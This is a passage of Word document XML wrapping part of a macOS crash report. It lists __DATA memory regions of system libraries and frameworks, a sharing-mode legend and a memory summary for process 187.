      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79863000-00007fff7986b000 [   32K] rw-/rwx SM=COW  /usr/lib/libc++.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff7986d000-00007fff7986e000 [    4K] rw-/rwx SM=COW  /usr/lib/libCRFSuite.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79877000-00007fff79879000 [    8K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/NetAuth.framework/Versions/A/NetAuth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79879000-00007fff7987a000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/FSEvents.framework/Versions/A/FSEvents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fff7987a000-00007fff7987c000 [    8K] rw-/rwx SM=COW  /usr/lib/system/libcompiler_rt.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff7989b000-00007fff79961000 [  792K] rw-/rwx SM=COW  /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79961000-00007fff79966000 [   20K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/CoreDuet.framework/Versions/A/CoreDuet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79966000-00007fff79967000 [    4K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/TCC.framework/Versions/A/TCC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79967000-00007fff79970000 [   36K] rw-/rwx SM=COW  ...brary/Frameworks/OpenDirectory.framework/Versions/A/Frameworks/CFOpenDirectory.framework/Versions/A/CFOpenDirectory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79973000-00007fff79975000 [    8K] rw-/rwx SM=COW  /usr/lib/libc++abi.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79a44000-00007fff79a45000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_blocks.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79a45000-00007fff79a80000 [  236K] rw-/rwx SM=COW  ...ameworks/ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/Resources/libFontParser.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79b8c000-00007fff79b92000 [   24K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/AE.framework/Versions/A/AE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79b92000-00007fff79b97000 [   20K] rw-/rwx SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libJP2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79c63000-00007fff79c69000 [   24K] rw-/rwx SM=COW  /usr/lib/system/libsystem_network.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79c90000-00007fff79c91000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libquarantine.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79c91000-00007fff79c92000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libGIF.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79c92000-00007fff79c9a000 [   32K] rw-/rwx SM=COW  /usr/lib/libcups.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79d3b000-00007fff79d42000 [   28K] rw-/rwx SM=COW  .../Frameworks/CoreServices.framework/Versions/A/Frameworks/DictionaryServices.framework/Versions/A/DictionaryServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79d42000-00007fff79d43000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_trace.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79d77000-00007fff79d79000 [    8K] rw-/rwx SM=COW  /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/QD.framework/Versions/A/QD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79d85000-00007fff79d8d000 [   32K] rw-/rwx SM=COW  /usr/lib/libextension.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79d8f000-00007fff79d90000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/IOSurface.framework/Versions/A/IOSurface</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79d90000-00007fff79d91000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGFXShared.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79d91000-00007fff79dc3000 [  200K] rw-/rwx SM=COW  /System/Library/Frameworks/Security.framework/Versions/A/Security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79de2000-00007fff79de3000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libunwind.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fff79de4000-00007fff79de5000 [    4K] rw-/rwx SM=COW  /usr/lib/libMatch.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79de5000-00007fff79de6000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libCVMSPluginSupport.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79de6000-00007fff79de7000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libcopyfile.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79e09000-00007fff79e0a000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_configuration.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79ea0000-00007fff79ea3000 [   12K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudio</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79ec4000-00007fff79ec5000 [    4K] rw-/rwx SM=COW  /usr/lib/libxslt.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79ef3000-00007fff79f05000 [   72K] rw-/rwx SM=COW  /System/Library/Frameworks/AudioToolbox.framework/Versions/A/AudioToolbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79f26000-00007fff79f2b000 [   20K] rw-/rwx SM=COW  /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libLAPACK.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79f3f000-00007fff79f40000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_networkextension.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79f6e000-00007fff79f70000 [    8K] rw-/rwx SM=COW  /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libBLAS.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79f77000-00007fff79f79000 [    8K] rw-/rwx SM=COW  /System/Library/Frameworks/Kerberos.framework/Versions/A/Kerberos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79fa1000-00007fff79fa2000 [    4K] rw-/rwx SM=COW  /usr/lib/libxar.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79fa3000-00007fff79fe3000 [  256K] rw-/rwx SM=COW  /usr/lib/libmecabra.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79ff4000-00007fff79fff000 [   44K] rw-/rwx SM=COW  /usr/lib/libxml2.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff7a188000-00007fff7a18a000 [    8K] rw-/rw- SM=COW  /System/Library/PrivateFrameworks/AppleVPA.framework/Versions/A/AppleVPA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff7a1a0000-00007fff7a1a1000 [    4K] rw-/rw- SM=COW  /usr/lib/system/libsystem_m.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff7a1bb000-00007fff7a1bc000 [    4K] rw-/rw- SM=COW  /usr/lib/libarchive.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff7a1bc000-00007fff7a1c8000 [   48K] rw-/rw- SM=COW  ...tem/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ColorSync.framework/Versions/A/ColorSync</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff7a1ce000-00007fff7a1fb000 [  180K] rw-/rw- SM=COW  /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/Metadata.framework/Versions/A/Metadata</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 Legend</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">SM=sharing mode:  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">COW=copy_on_write PRV=private NUL=empty ALI=aliased </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>SHM=shared ZER=zero_filled S/A=shared_alias</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 Summary for process 187</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>ReadOnly portion of Libraries: Total=146.3M resident=86.4M(59%) swapped_out_or_unallocated=59.9M(41%)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>Writable regions: Total=39.2M written=584K(1%) resident=652K(2%) swapped_out=0K(0%) unallocated=38.5M(98%)</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REGION TYPE                      VIRTUAL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>===========                      =======</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>Dispatch continuations             4096K</w:t>
      </w:r>
    </w:p>
